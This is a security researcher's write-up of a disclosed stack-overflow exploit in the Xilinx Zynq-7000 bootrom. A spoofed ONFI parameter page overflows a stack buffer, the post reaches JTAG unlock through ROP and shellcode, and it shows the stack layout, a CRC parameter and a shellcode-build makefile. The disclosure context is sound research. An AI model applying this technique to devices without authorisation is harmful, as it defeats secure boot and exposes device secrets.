Introduction
Also known via DAAR-76201.
If you're just tuning in now and want context beyond "here's a bug in some rom code": Check out part 1 and part 2. I'll be here.
Now - The Zynq-7000 series provides a root-of-trust via the usual methods: eFuse array containing hashes and/or keys. The actual scheme seems solid - I'm absolutely no cryptographer - and the implementation details that Xilinx doesn't document don't really expose anything particularly damning.
TL;DR // Executive Summary
-
Zynq secure boot is not sufficient to protect secrets against an attacker with physical access. If you rely on this root of trust to protect a secret that is not unique per-device, reconsider your architecture.
-
The vulnerable code also exists in Xilinx's 'embeddedsw' HAL. Software built from Xilinx tools prior to the release
xilinx_v2021.1
without backported fixes is vulnerable in exactly the same way. -
This exploit uses the Zynq's NAND/ONFI interface, so unless the target already exposes those nets, it's unlikely to make a good modchip. Bear in mind the previous point, however.
-
Yes, you can recover bitstreams this way - I have not yet tried, but there is no reason that shouldn't work.
Bug
When the Zynq initially scans for ONFI devices, it grabs the ONFI parameter page and populates local copies of some of these fields (this function is nearly identical to
Onfi_NandInit
in the Xilinx xnandps driver).
The Zynq ROM ONFI driver fails to do any validation of this parameter page. In normal flash devices this isn't configurable, but it's still technically untrusted data... And it has a plethora of interesting fields that nominally dictate the organization and layout of the flash device (ECC, bad blocks, spare area, and so on).
An "emulator" that controls all of these fields is required to exploit this, so we have to build one of those. Let's discuss that a little before exploring the vulnerability in detail.
Wait, ONFI?
ONFI is a standard (in that it is defined, not so much in that it is strictly followed) that describes nominally how to talk to unmanaged flash chips. On a board, chips supporting ONFI commonly look like this:
Commonly found in TSOP48 packages like this one |
Think of it like the de-factor "standard" that is how most serial (SPI) flash chips talk, except there are some older-school aspects like command/address latch strobes, and so forth. On the wire, a reset (0xFF
) and read status (0x70
) with response looks something like this:
The parameter page is a part of this standard which describes everything from physical characteristics to supported features. It's read with a special opcode (0xEC
), plus an address (and I guess there's support for extended parameter pages? I didn't implement this, the Zynq doesn't use it). Of interest to us here (remember? writing an exploit) are bytes 80 through 99: These describe the number of bytes per various NAND primitive (page, LUN, block, spare page).
I'll spare you the details of the ONFI emulation (and my code), but I glued together my emulation of the bare subset of ONFI commands needed to reach this point:
opcode | wat? |
---|---|
0x90 | Read device ID |
0xEC | Read parameter page |
0x00 | Page read |
0x30 | End page read |
0x70 | Status register read |
0xFF | Reset |
Not very many! ONFI allows for a couple commands during a busy cycle (ie: while buffering or erasing a page). Since the overflow is within the first page read ever submitted, I can just naively spit out the payload and ignore addressing entirely.
Arguably, the worst part about this is that it requires soldering in a ONFI emulator (ie: another FPGA) - And ONFI flash is usually a cost reduction measure, so none of the nicer Zynq dev kits use it! Luckily I had one of those Antminer boards kicking around (featured previously!), and they boot off ONFI NAND, so a bit of hot air and handful of bodge-wire joints later, it was broken out:
luckily, I could run the interface slowly enough that this worked... |
detail of the flash breakout |
I decided to build in a set of headers to hang my logic analyzer off of - The Saleae I used here is definitely overkill, but (especially when writing an exploit) better introspection is invaluable. Arguments may be made for using an ILA (Integrated Logic Analyzer) on the FPGA, but in my experiences it introduces too much latency in the test-verify loop - I'd absolutely recommend a standalone device like this. I wrote much of the ONFI support and verified it in simulation, but not everything about the Zynq's flash controller is a) known and b) worth writing into a test harness!
For example: one amusing point was discovering that the NAND controller hardware in the Zynq won't complete a page read transaction unless you drive R/#B
low (busy) for some period of time. That certainly wasn't in my test bench.
I wasn't ever busy, c'mon!
Exploit
Of particular (easiest-to-exploit)
interest is SpareBytesPerPage
- Everything else just needs to be legitimate enough to make it past some minimal checks. Since raw NAND is a disaster, it's not
uncommon for the chips to have some built-in-ECC, which would be really annoying. We can bypass all of the logic related to this just by reporting a manufacturer ID of any value but Micron's ID (0x2c
).
Finally, there's a CRC at the end, which may be generated something like this:
crcmod.mkCrcFun(0x18005, initCrc=0x4f4e, rev=False)
Once the NAND driver's context is populated, and after some housekeeping (XNandPs_CfgInitialize
), the bootrom searches for the
ONFI "Bad Block Table".
Since NAND is so error-prone, there's a standardized (ish) method to provide a bitmap of known unusable whole blocks, and this is stored (along with ECC data)
in the "spare area" of flash pages. Usually this is all nicely aligned so that addressing is somewhat as simple as masking out a couple bits,
but the important part here is that this is the first time a value from our parameter page is used - XNandPs_ReadSpareBytes
does no
sanity checks before happily reading the entire spare page (per the descriptor) into the supplied buffer.
Since the buffer in question is a 0x200
long stack variable in XNandPs_SearchBbt
's frame, we have a trivial stack smash with very good control.
(It's even better than that - LR
gets incidentally set to the top of this buffer...I didn't end up using this. Potentially this lets you skip the whole ropchain!) We can even control the return value of XNandPs_ReadSpareBytes
by supplying or not supplying the bad block table signature (Bbt0
) while still triggering the overflow. Register control is likewise very strong, R4
thru R11
are saved and restored
from the smashed frame:
[sp+0x000]
[sp+0x008] destination buffer
[...]
[sp+0x..4] other vars
[sp+0x..8] saved r4
[sp+0x..C] saved r5
[...]
[sp+0x..C] saved pc
After gluing in some BRAM and a bit of JTAG code to push payloads up to the FPGA, I got the bootrom to crash (!!). I experimented with the over-read size, and observed the results on the wire with the logic analyzer: When an invalid pointer was accessed, the ROM would fault and wouldn't make further ONFI transactions. I used this "oracle" to verify the stack frame layout from my reverse engineering.
...And then, at some point I just filled the spare page with 0x000006a0
(uart_init
) hoping to hit a saved LR
or PC
, and this popped out:
Obviously this isn't sufficient - The Zynq boots with JTAG disabled and all kinds of interesting security features unlocked, plus it would be fun to debug the bootrom...
To rapidly prototype the payload/shellcode, I put together a tiny makefile to convince the linker to base everything at 0 as initially I had no idea where in RAM I was - I tried calculating it at some point and ended up being wildly off. This breaks indirect jumps, but that's trivial enough to work around (and uhm, lazy). Here's a copy, in case it's useful to someone:
as = arm-none-eabi-as
objcopy = arm-none-eabi-objcopy
objdump = arm-none-eabi-objdump
ld = arm-none-eabi-ld
proj = sc
all: $(proj).bin
disas: $(proj).bin
$(objdump) -D $(proj).bin -b binary -m armv7
sc.bin: $(proj).s
$(as) -o $(proj).o $(proj).s
$(ld) $(proj).o -Ttext 0 -Tdata 0 -o sc.elf
$(objcopy) -O binary $(proj).elf $(proj).bin
clean:
rm sc.bin
Although I had control, I was running into issues with the exploit. The goal was to poke a stub into RAM (push sp; pop pc
), and jump right into the stack that way - but it wasn't working.
The ROP seemed fine, but as soon as I jumped into shellcode everything broke. Thankfully I had one bit of output - I could jump to the UART bootloader used earlier and cause it to bring up the UART and
emit the "XLNX-ZYNQ" identification string.
After chasing the issue through what I was certain was caching (no: they're off), then ordering (easy to ROP to dsb/isb), then MMUs/page permissions (off, wrote
a chain to reconfigure them nevertheless)...I had the endianness flipped (thank you pwntools). So, lots of this could've been simpler...
Really, with all that effort it would've been simpler to just write a chain to re-enable JTAG and debug it normally, now that I think of it!
Nevertheless, once my shellcode worked I could clean everything up and figure out where in memory I was. One thing to be aware of at this point is that any exceptions will cause the Zynq to reboot. The IVT can be remapped, but this comes at the cost of remapping some RAM away from the ROM. Perhaps this could be solved by setting up a couple virtual pages...But I am quite satisfied where things are, so you can do that ;)
Another benefit of using a "proper" assembler to build the payload is that I had access to handy macros for math and padding - arm-none-eabi-as
is better at simple addition than I am,
especially after in the wee hours. I don't think there's any reason to release the whole ONFI tool, but here's the assembler file
I used to build the payload.
Zynq Bootrom unlocked:
sctlr: 0x8C50079, devcfg: 0x4E00607F, ocmcfg: 0x0
The shellcode simply unlocks JTAG, and spits out a few registers of interest: devcfg
contains the fabric config, including AES enable bits. sctlr
is the ARM core register which contains caching, prediction, and virtual memory enable bits. ocmcfg
is just the OCM configuration register. Nothing in the payload isn't contained in the TRM, but perhaps it makes this easier to follow.
Finally, I want to say that I cannot overstate how many random little rabbitholes I spent time chasing down, or how many tiny little things that prevented another bug from being exploitable. So it goes.
Demo?
Demo:
🦀???
Oh, very well. Somewhere in the middle of procrastinating on this and...other projects, I hacked together a self-hosted disassembler payload for this exploit. Of course, it's written in Rust:
You can find that questionble decision here, should you wish.
Disclosure notes
I don't think the exact timeline is particularly useful - Suffice to say that while Xilinx was difficult to initially get ahold of, they were usually responsive, always competent and straightforward. They did pay out a bounty. The bug was reproduced in a couple weeks, and their advisory was published just inside of 90 days. Good work :)
Go Top